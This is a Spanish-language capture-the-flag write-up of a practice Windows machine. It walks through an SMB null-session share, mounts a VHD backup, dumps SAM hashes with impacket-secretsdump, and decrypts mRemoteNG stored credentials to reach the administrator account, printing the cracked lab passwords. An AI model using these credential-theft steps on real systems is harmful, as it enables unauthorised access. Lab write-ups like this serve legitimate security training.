Hacemos el escaneo de nmap:
Si enumerados recursos compartidos con smbclient con una null session, vemos los sigueintes recursos compartidos:
smbclient -L 10.10.10.134 -N
Con smbmap podemos ver qué permisos tenemos sobre estos recursos compartidos, donde vemos que podemos leer y escribir sobre el recurso backups:
smbmap -H 10.10.10.134 -u 'null'
Nos conectamos a este recurso compartido donde vemos un directorio de backups de windows:
smbclient -N //10.10.10.134/Backups
Nos montamos todo este recurso de backups en nuestra máquina atacante de la siguiente forma:
mount -t cifs -o username=null,password=null //10.10.10.134/Backups /mnt/montura
Y ahora podremos navegar por los directorios sin descargarnos nada:
Y esta es la estructura de los directorios:
Y observamos dos archivos con extensión .vhd (archivo de disco virtual):
Y con la utilidad guestmount vamos a montar cada uno de los discos en una nueva carpeta, que crearemos la carpeta discos. Pero con uno de los discos nos da error, aunque con el otro funciona bien:
guestmount --add /mnt/montura/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro discos/
Y dentro del directorio /windows/system32/config, hay un archivo llamado SAM, donde se pueden contener hashes de usuarios, por lo que nos ubicamos en esta ruta y con impacket-secretsdump tratamos de obtenerlos:
Ejecutamos el siguiente comando y obtenemos los hashes:
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Y vemos que la web de crackstation nos encontró el hash del usuario L4mpje:
L4mpje:bureaulampje
Una vez obtenido esto, vamos a entrar por ssh:
ssh L4mpje@10.10.10.134
Y una vez dentro de la máquina, si nos ubicamos dentro de archivos de programa x86, vemos un directorio llamado nRemoteNG, que es extraño:
En este enlace tenemos instrucciones de cómo explotar esto mismo:
https://ethicalhackingguru.com/how-to-exploit-remote-connection-managers/
Dentro de esta web, se nos dice que hay una ruta donde se guardan credenciales en un archivo confCons.xml:
Y confirmamos que ese archivo efectivamente existe en la ruta C:\Users\L4mpje\AppData\Roaming\mRemoteNG:
Pero la contraseña viene encriptada en este archivo, pero sí vemos al principio la línea de protected con la siguiente contraseña
aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Por lo que vamos a pasarnos este archivo en local a nuestra máquina atacante y vamos a tratar de romperlo:
scp l4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .
Y lo tenemos en local:
Una vez hecho esto, contamos con el siguiente exploit para romper este archivo y ver credenciales en claro:
https://github.com/haseebT/mRemoteNG-Decrypt
Ejecutamos este exploit siguiendo las instrucciones, pasándole la contraseña protegida y la obtenemos en texto claro:
python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Las credenciales del administrador son las siguientes:
administrator:thXLHM96BeKL0ER2
Entramos por ssh:
ssh Administrator@10.10.10.134
Y ya estamos dentro: